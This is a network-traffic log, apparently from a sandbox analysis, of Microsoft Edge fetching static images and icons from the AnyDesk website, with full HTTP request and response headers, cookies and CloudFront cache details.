sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:42 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: MV9RcoflUSrQhH1OB4heYOfUcXxvHbk7dcTdqUr5EQZiQKRdESdP_w==
age: 61652
GET

https://anydesk.com/_static/img/icons/twitter-logo-white.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/twitter-logo-white.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: rv9ECgDuPcfKwDtme2_wSGtTLrfycqFBEIgTF8kn5XGRK6IoQR6NkQ==
age: 61654
GET

https://anydesk.com/_static/img/badges/google-play-badge-1338ed.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/google-play-badge-1338ed.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: MhJ9VbRGWRuwnfMQx3YjChS-LDQMIwgMAUR_oKT_W5W06chh8m0Qaw==
age: 61654
GET

https://anydesk.com/_static/img/badges/app-store-badge-2f2fe1.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/app-store-badge-2f2fe1.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: AkLHpDgU5xkRcLGYppZ4D9_z2AwsNl-Izl54p1TcTVMrIQ0Pwd4vCg==
age: 61654
GET

https://anydesk.com/_static/img/badges/google-play-badge-1338ed.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/google-play-badge-1338ed.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: dLrzn1f9vpx4DDkiJfeIBStkSLPfxcAwDc5fPd0_41_xLwFO0O70aQ==
age: 61654
GET

https://anydesk.com/_static/img/badges/app-store-badge-2f2fe1.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/app-store-badge-2f2fe1.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:42 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: StRGy1ezE01ejT9g0AgniM7M13Yf-3r4wADhN-dsC1mALiwtwtQ5ig==
age: 61653
GET

https://anydesk.com/_static/icons/white/bold/keyboard-arrow-top-right-5f4184.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/white/bold/keyboard-arrow-top-right-5f4184.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:42 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 0GeqpVvPa6nZafnXa3BK_29Qb2bgbgNDC2GfnpHxFBf8C00haK0xXw==
age: 61653
GET

https://anydesk.com/_static/img/hero/fadeout-stuttgart-opera-mobile-newsletter.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/hero/fadeout-stuttgart-opera-mobile-newsletter.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/windows
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:42 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: ZhfQgAkSU-TDkSVrf-ExxAbtNMBskTeObRFKTib_KMkb_dtmeMj0yA==
age: 61654
GET

https://anydesk.com/_static/img/icons/tiktok-logo-white.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/tiktok-logo-white.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:42 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: BehKVw6FiqUeDEVdEm4c8g3zBZUUI8p3FVyGUJzQSf_cAaW95W9roA==
age: 61654
GET

https://anydesk.com/_static/img/icons/twitter-logo-white.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/twitter-logo-white.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:42 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: jRlCBTaKyoCUznn695oSHTo0dV6CeZvp0DKaW_PRf1uUcy_M-tYHiw==
age: 61654
GET

https://anydesk.com/_static/img/icons/streamline/logos/social-medias/social-media-reddit-white.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/streamline/logos/social-medias/social-media-reddit-white.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:42 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: OfKboP8_Wjjs9Z9RJYAFtvlGa1qTTHZahH4_cAPToBdsutRVWgrL0w==
age: 61654
GET

https://anydesk.com/_static/img/icons/streamline/logos/videos/social-video-youtube-clip-white.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/streamline/logos/videos/social-video-youtube-clip-white.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:42 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: R6dm52he85K-4IU0IQni7pHIalgfOItKEtLVyR1Uo8B9WLmMRzAS1g==
age: 61654
GET

https://anydesk.com/_static/img/icons/streamline/logos/professional-networks/professional-network-linkedin-white.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/streamline/logos/professional-networks/professional-network-linkedin-white.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:01:00 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Nmy0oz603jFhhmqhXorKTBxt8xAzi5tRMkX8Ie01KaBKSMa6m7F2YQ==
age: 61636
GET

https://anydesk.com/_static/img/icons/streamline/logos/social-medias/social-media-facebook-white.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/streamline/logos/social-medias/social-media-facebook-white.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:42 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 6dJE73WmWwZPhf7LiL3NcmD1P9Et9CHx4kVuZm1Lomduzn61_U_ZrA==
age: 61653
GET

https://anydesk.com/_static/img/icons/streamline/logos/photos-images/social-instagram-white.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/streamline/logos/photos-images/social-instagram-white.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/x-icon
content-length: 15086
server: nginx
date: Sat, 05 Oct 2024 16:08:17 GMT
cache-control: max-age=604800
accept-ranges: bytes
etag: W/"15086-1722324074000"
last-modified: Tue, 30 Jul 2024 07:21:14 GMT
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Miss from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: W9Xthm3FOJclKn9OrFPikdGLxVtDWWSxxm-T4r7oHN9wxh31ZZu05w==
GET

https://anydesk.com/_static/css/slick/ajax-loader.gif

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/css/slick/ajax-loader.gif HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/_static/css/slick/slick-theme.min-7c2e6e.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 6267
server: nginx
date: Sat, 05 Oct 2024 00:06:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 6BiASz5YpK6ROpyl0ITSY2gVCWWnYRDo28_nq8CoRjZ2JkXMcU4Vhg==
age: 57680
GET

https://anydesk.com/_static/img/icons/streamline/video-movies-tv/video-players/controls-play-white.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/streamline/video-movies-tv/video-players/controls-play-white.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: has_downloaded=true
cookie: __hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1
cookie: hubspotutk=a5b3d1933284be27e3a7527fad5a6a3f
cookie: __hssrc=1
cookie: __hssc=261462610.1.1728144483689
cookie: JSESSIONID=A87AC6354006C6F2CB8E6F875D9B3B64

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:11:52 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
